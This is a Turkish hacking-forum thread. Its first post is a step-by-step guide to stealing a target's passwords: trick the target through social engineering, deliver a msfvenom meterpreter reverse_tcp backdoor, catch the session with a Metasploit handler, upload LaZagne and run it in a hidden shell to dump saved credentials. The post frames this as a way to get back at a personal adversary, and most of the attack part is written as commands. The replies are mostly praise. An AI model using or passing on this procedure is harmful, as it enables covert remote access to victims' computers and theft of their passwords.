İPUCU

Linux Linux İle İlgili Bilgi Paylaşım Platformu

Seçenekler

hedefdeki tum sifreleri calmak m@tasploit uzerinden

11-08-2018 21:38
#1
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Mesajlar:
2.745
Teşekkür (Etti):
0
Teşekkür (Aldı):
754
Konular:
174
Ticaret:
(0) %


Merhaba arkadaslar




bu gunde 1 konu acma kararini aldim aslinda dun acacaqdim amma gec oldu deye youtubeye uploiad etmedim amma bu gun bu konunu sizlerle paylasmak isdiyorm. arkadaslar.. sosial muhendslik deye bir anlayis vardir dimi bu proje ile hedefin sifresin kendi agzindan ala ve yahudda guven kazanib idare ede bilirsiniz ben size 1 kitap ornek vermek isderim devid kevin mitnik aldatma sanati deye yanlis hatirlamiramsa 1 kitap vardi evet ismi boyleydi forma uye olmamisdan once defalarca okmusdum baya ise yariyor google amcadan sora bilirsiniz . Ben ilk oncelikle sosial muhendislikde itibar kazanma sui isdifade etme taktiyinnen kendi bildiklermi az da olsa anlatmak isderim burda belirl;i 1 hedef ola bilir yada tesaduf hedef olada bilir belirli uye mesela biri benle dalqa kecmis bende gmail ile ya numarasina ya yandekse ya bayan adiyla instagramda ya baskaaa baska yerlerde konusa ve ikna ede guven kazana ve ben uyquladiqim gibi kalide msfvenomda 1 payload hazirlayip hedefe gondermek yaniii mumkin gibi gozukuyormus. amma 1 az ipucu veriyim ki eyer hedef payloadi indirip acmissa sizde kalide hazir ****sploit bekler sekilde dayanmisinizsa kalicilik saglayin ve yahudda bir beefle biraz ireli seviyye 1 seyler yapa bilirsiniz


evet konudan uzaklasmak isdemiyorm 1 az ipucu verdim siz akliniza gore bir seyler yapin simdi 1 lazagne yukleyelim bilgisayara kali linuksa





o sitede lazagne.zip olarak goreceksiniz zipden cikaralim temiz bir is yapmak icin ise terminali acip 1 qovluq yarataq

Kod:
  mkdir virus

evet simdi 1 klasor olusdurmus olduq ardina ise icerisine giris yapalim

Kod:
  cd virus

deyerek virus klasorne giris yapmis olduq ardina ise icerisinde ne varmis deye bakalim amma bunu yapmamisdan once 1 payload hazir edelim

Kod:
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe > /root/Desktop/virus/bad.exe

soyledik ve bizim az once yaratmis olduqumuz klasore 1 backdoor olusdu haaa simdi tam zamani virus klasorun kontrol edelim

Kod:
  ls

ve burada payloadi gorduk simdi bu klasore lazagnenide atalim virus klasorne attikdan sonraysa zip den cikaralim gorduk

Kod:
  unzip lazagne.zip

ve virus dosyasinda payload ve lazagne var evettt simdi ilk olarak ise payloadi hedefe ilk basda anlaiqim gibi ve yahuda baska yolla hedefe gonderelim ve hedefin payloadi acmasin beklememisden once ise ****sploit konsulun acalim

https://i.resimyukle.xyz/QJQ4Cz.png



acdik ****sploiti nasilmi ? terminala msfconsole yazdik


Kod:
   msfconsole
simdi ise gereken parametreleri girelim

Kod:
   use exploit/multi/handler
Kod:
  set payload windows/meterpreter/reverse_tcp
Kod:
   set LHOST ip
Kod:
  set LPORT port
Kod:
 exploit

burada port msfvenoma yazmis olduqumuz acik port ip kismi ise msfvenoma yazdiqimiz ip yazilmali exploit yazmakla dinlemeye alinmalidir. evet bu ****sploiti nedenmji acdik evet virus klasorundeki az once yaratmis olduqumuz payloadi hedefe gonderelim ve hedefe gonderdik hedef tikladi payloada balanti geldi ****sploitte otrum acildi simdi kecelim b planina



B plani

haaa arkadaslarr b planim var benim bu plan ise mesela ****sploitte mumkun karsi hedefin sifrelerin calmak amma beklemek leazimki ne zaman sifre girecek o zaman sifre gelecek sabri olmayan arkadaslar neden lazagneni karsiya ipload etmeyelim ? baslayalim upload islemlerine exploit soyledik dimi ? peki o zaman ardince ne yazalim ? sessions -i ile id kiymetin oyrenip id deyerni girelim kiymet ana ekranda 1 cikarsa 1 2 cikarsa 2 yazalim tam asagidaki gibi

Kod:
  sessions -i

soyledik ve ana ekrana 1 kiymeti yazisi cikmis


ve ardica ise ls le bakiyoruzki neredeyiz mesela yol bize desktopu gosteriyor ana ekrani hedefin tamam cd .. biraz arkaya gederek cd komutu hedef qoovluq adin yazarak upload ede bilirsiniz asagidaki parametre kopnudaki virus yeri hedefe nasil atlacak yazlacakdir kodda kolaylik saridan

Kod:
  upload /root/Desktop/virus/lazagne.exe c:\\USERS\hedef dosya yeri

ve upload islemi videoda gorduyunuz gibi yerne yetrilmsidir ardinca ise arkadaslar bir parametre ile consulu aktiv hale getrip sifreleri cekelim

Kod:
   execute -f cmd.exe -i -H

ve olduqmuz yerde lazagne.exe yazalim lazagne.exe all yazarak sifreler kirlacakdir



Konu cewl tarafından (11-08-2018 21:54 Saat 21:54 ) değiştirilmiştir.

11-08-2018 21:39
#2
Üyelik tarihi:
03/2017
Mesajlar:
167
Teşekkür (Etti):
108
Teşekkür (Aldı):
4
Konular:
78
Ticaret:
(0) %
ilk hocam
11-08-2018 21:56
#3
Slyfer - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2016
Nereden:
Unknown
Mesajlar:
1.596
Teşekkür (Etti):
18
Teşekkür (Aldı):
169
Konular:
33
Ticaret:
(0) %
Elinize sağlık
Kullanıcı İmzası

i want to sleep f o r e v e r
11-08-2018 21:56
#4
Üyelik tarihi:
09/2017
Nereden:
T Ü R K
Mesajlar:
682
Teşekkür (Etti):
66
Teşekkür (Aldı):
35
Konular:
127
Ticaret:
(0) %
güzel
11-08-2018 22:27
#5
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Mesajlar:
2.745
Teşekkür (Etti):
0
Teşekkür (Aldı):
754
Konular:
174
Ticaret:
(0) %
Alıntı:
Slyfer´isimli üyeden Alıntı Mesajı göster
Elinize sağlık
Alıntı:
ivandrakula´isimli üyeden Alıntı Mesajı göster
güzel
tesekkurler

Alıntı:
Thelostcast´isimli üyeden Alıntı Mesajı göster
ilk hocam

cok tesekkurler
mayktayson Teşekkür etti.
19-08-2018 00:30
#6
crodaline - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2007
Nereden:
samsun
Mesajlar:
128
Teşekkür (Etti):
1
Teşekkür (Aldı):
4
Konular:
22
Ticaret:
(0) %
Elinize sağlık
Kullanıcı İmzası
Ben OyuM MuTLu OLaN KuTaL...
19-08-2018 01:57
#7
Bykurabiye - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
Tanrı Dağı
Yaş:
16
Mesajlar:
2.506
Teşekkür (Etti):
343
Teşekkür (Aldı):
259
Konular:
153
Ticaret:
(0) %
Elinize sağlık.Konuya gerçekten bayıldım.
Kullanıcı İmzası
Birazcık Yukarıya Bak.

Bir şey her şey için, her şey bir şey için vardır.
J. W. Von GOETHE
19-08-2018 06:13
#8
Üyelik tarihi:
06/2015
Mesajlar:
960
Teşekkür (Etti):
71
Teşekkür (Aldı):
109
Konular:
81
Ticaret:
(0) %
elinize sağlık çok yararlı bir konu. ama msfvenom ile oluşturduğumuz trojeni armitage'e yüklesek daha verimli çalıştırabiliriz.
Kullanıcı İmzası
Don’t be too optimistic. The light at the end of the tunnel may be another train.
19-08-2018 06:50
#9
LifeHacker - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Mesajlar:
853
Teşekkür (Etti):
133
Teşekkür (Aldı):
117
Konular:
117
Ticaret:
(0) %
Eline Sağlık.
Kullanıcı İmzası
"Bir millet eğitim ordusuna sahip olmadıkça, savaş meydanlarında ne kadar parlak zaferler elde ederse etsin, o zaferlerin kalıcı sonuçlar vermesi ancak eğitim ordusuyla mümkündür."

M.KEMAL ATATÜRK
19-08-2018 07:46
#10
"Tranquila - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2017
Nereden:
Trabzon
Yaş:
1
Mesajlar:
2.001
Konular:
225
Ticaret:
(0) %
eLine sağlık

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı